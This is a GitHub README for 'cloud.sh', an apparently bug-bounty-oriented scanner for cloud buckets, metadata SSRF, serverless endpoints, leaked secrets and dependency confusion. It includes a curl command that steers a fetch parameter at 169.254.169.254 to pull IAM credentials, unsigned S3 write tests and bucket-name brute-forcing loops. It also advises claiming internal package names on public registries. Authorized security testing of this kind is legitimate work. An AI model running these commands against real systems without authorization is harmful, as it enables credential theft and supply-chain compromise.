Skip to content

Sharon-Needles/cloud

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

cloud.sh — Cloud & Supply Chain Scanner

8-phase scanner for cloud infrastructure and supply chain attack surfaces: AWS/Azure/GCP enumeration, S3/Blob bucket discovery, metadata SSRF, serverless function hunting, JS dependency analysis, and dependency confusion.


Features

8-Phase Pipeline

Phase Script What It Tests
1 cl_cloud_enum.sh AWS, Azure, GCP subdomain enumeration by company keyword
2 cl_bucket_scan.sh S3, Azure Blob, GCS bucket discovery — open read/write access
3 cl_metadata_ssrf.sh Metadata endpoint SSRF (169.254.169.254, fd00:ec2::254) for IAM token theft
4 cl_serverless.sh Lambda, Azure Functions, Cloud Run endpoint discovery
5 cl_js_audit.sh JavaScript file analysis for cloud credentials, internal endpoints, hardcoded secrets
6 cl_dep_confusion.sh Dependency confusion/typosquatting in package.json, requirements.txt
7 cl_sri_check.sh Missing Subresource Integrity on CDN-served JS/CSS
8 cl_cloud_secrets.sh Cloud keys, IAM credentials, API tokens in HTML, JS, headers

Quality

  • Resume support — Phase-level checkpointing
  • VRT-aware output — Findings categorized P1–P5
  • Keyword-driven — Phase 1 & 4 enumerate {keyword}-prod, {keyword}-dev, etc.
  • Report generation — Bugcrowd/H1-ready Markdown with evidence

Requirements

Required

sudo pacman -S curl jq

Recommended

sudo pacman -S python3 gau katana
pip install trufflehog  # or: sudo pacman -S trufflehog

Optional API Keys

export SHODAN_API_KEY="your_key"    # Cloud IP enumeration
export GITHUB_TOKEN="your_token"    # GitHub search for leaked cloud creds

Installation

git clone https://github.com/Sharon-Needles/cloud
cd cloud
chmod +x cloud.sh scripts/*.sh

# Global symlink (optional)
sudo ln -s "$(pwd)/cloud.sh" /usr/local/bin/cloud

Quick Start

Interactive Mode

./cloud.sh

CLI Mode — Full Scan

./cloud.sh --target "Acme Corp" --domains scope.txt --keyword acme --platform bugcrowd

The --keyword flag drives bucket and serverless enumeration (tries acme-prod, acme-dev, acme-staging, etc.).

Resume

./cloud.sh --resume ./hunts/Acme_CLOUD_20260423_120000

Single Phase

./scripts/cl_bucket_scan.sh --domains scope.txt --keyword acme -o ./bucket_results
./scripts/cl_metadata_ssrf.sh -d app.example.com -o ./ssrf_results
./scripts/cl_js_audit.sh --domains scope.txt -o ./js_results

Usage

cloud.sh [OPTIONS]

Modes:
  (no args)               Interactive
  --target NAME           Target program name
  --domains FILE          File with domains (one per line)
  --keyword KEYWORD       Company keyword for bucket/serverless enumeration
  --platform PLATFORM     bugcrowd | hackerone | other
  --out DIR               Output directory (default: ./hunts)
  --resume PATH           Resume from previous run

Options:
  -t, --threads N         Concurrency (default: 30)
  -h, --help              Show help
  --version               Print version

Examples

Full cloud scan with keyword:

cloud --target "Acme Corp" --domains scope.txt --keyword acme --platform bugcrowd

Bucket scan only:

./scripts/cl_bucket_scan.sh --domains scope.txt --keyword "acme" -o ./bucket_out

JS credential scan:

./scripts/cl_js_audit.sh --domains scope.txt -o ./js_out

Output Structure

Acme_Corp_CLOUD_20260423_120000/
├── manifest.json
├── phase_status.txt
├── timeline.log
│
├── cl_cloud_enum/
│   ├── aws_domains.txt            # *.amazonaws.com, *.s3.amazonaws.com
│   ├── azure_domains.txt          # *.azurewebsites.net, *.blob.core.windows.net
│   ├── gcp_domains.txt            # *.appspot.com, *.storage.googleapis.com
│   └── cloud_live.txt             # Responding cloud endpoints
│
├── cl_bucket_scan/
│   ├── s3_candidates.txt          # S3 bucket names tried
│   ├── s3_open_read.txt           # Publicly readable buckets
│   ├── s3_open_write.txt          # Publicly writable buckets (P1!)
│   ├── azure_blobs.txt            # Azure Blob results
│   └── gcs_buckets.txt            # GCS public buckets
│
├── cl_metadata_ssrf/
│   ├── ssrf_candidates.txt        # Endpoints that fetch remote URLs
│   ├── metadata_responses.txt     # 169.254.169.254 responses
│   └── iam_tokens.txt             # Extracted IAM credentials (P1!)
│
├── cl_serverless/
│   ├── lambda_endpoints.txt       # Lambda function URLs
│   ├── azure_functions.txt        # Azure Function endpoints
│   └── cloud_run.txt              # GCP Cloud Run services
│
├── cl_js_audit/
│   ├── js_files.txt               # JS files audited
│   ├── hardcoded_creds.txt        # Potential credentials in JS
│   └── internal_endpoints.txt     # Internal API URLs from JS
│
├── cl_dep_confusion/
│   ├── package_files.txt          # package.json, requirements.txt found
│   ├── internal_packages.txt      # Internal package names identified
│   └── confusion_candidates.txt   # Packages vulnerable to dep confusion
│
├── cl_sri_check/
│   └── missing_sri.txt            # Third-party scripts without SRI
│
├── cl_cloud_secrets/
│   ├── secret_candidates.txt      # All potential secrets found
│   └── validated_secrets.txt      # Confirmed active credentials
│
├── findings.txt
├── [SUBMIT:P1].txt               # Open-write buckets, leaked IAM tokens
├── [SUBMIT:P2].txt               # Open-read buckets with sensitive data
├── [SUBMIT:P3].txt               # Unauthenticated serverless endpoints
├── [REVIEW:P4].txt               # Manual review needed
├── [DO_NOT_SUBMIT:P5].txt        # SRI missing (without CDN compromise chain)
└── report.md

High-Value Finding Patterns

Open-Write S3 Bucket (P1)

aws s3 ls s3://acme-backup/ --no-sign-request
aws s3 cp test.txt s3://acme-backup/ --no-sign-request

If write succeeds: P1 critical — attacker can backdoor static assets or host phishing content.

Metadata SSRF → IAM Token (P1)

Webhook or URL-fetching parameter → redirect to http://169.254.169.254/latest/meta-data/iam/security-credentials/:

curl "https://app.example.com/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/"

Open-Read Bucket with Sensitive Files (P2)

Bucket readable but no write. If it contains: backups, config files, credentials, PII → P2. If it contains only public assets → P5 (not reportable).

Dependency Confusion (P2–P3)

Internal package names found (e.g., acme-internal-lib) that don't exist on npm/PyPI. Register the package name on the public registry → all CI/CD systems will install your version.

SRI Missing (P5 — Never Submit Alone)

<script src="https://cdn.example.com/lib.js"> without integrity=sha256-.... Only reportable if you can demonstrate CDN compromise that would deliver malicious JS.


Integration with hunt.sh

# Use hunt.sh JS secrets output as cloud.sh input
cat ./hunts/Target_*/js_secrets.txt | grep "amazonaws\|azurewebsites\|appspot" | \
  awk '{print $1}' | sort -u > cloud_endpoints.txt

cloud --target "Target" --domains cloud_endpoints.txt --keyword "target" --platform bugcrowd

Troubleshooting

"No buckets found"

Try more keyword variants manually:

for kw in acme acme-corp acmecorp acme-prod acme-dev acme-staging acme-backup; do
    aws s3 ls s3://$kw/ --no-sign-request 2>&1 | grep -v "NoSuchBucket\|AccessDenied" && echo "$kw FOUND"
done

SSRF check times out

Some URL fetchers have server-side timeouts. Test fast:

curl -sk "https://app.example.com/fetch?url=http://169.254.169.254/" -m 5

JS audit finds too many false positives

Filter with:

grep -i "key\|secret\|token\|password" ./cl_js_audit/hardcoded_creds.txt | \
  grep -iv "test\|example\|dummy\|placeholder"

Tested On

  • OS: BlackArch Linux, Ubuntu 22.04
  • Bash: 5.x
  • Dependencies: curl, jq (required); Python 3, AWS CLI (recommended)

License

MIT


Disclaimer

Only test on authorized targets. Accessing open buckets without permission may be illegal even if publicly accessible. Only interact with buckets clearly in scope of an active bug bounty program.

About

8-phase cloud & supply chain scanner — S3 buckets, metadata SSRF, dep confusion, cloud secrets

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors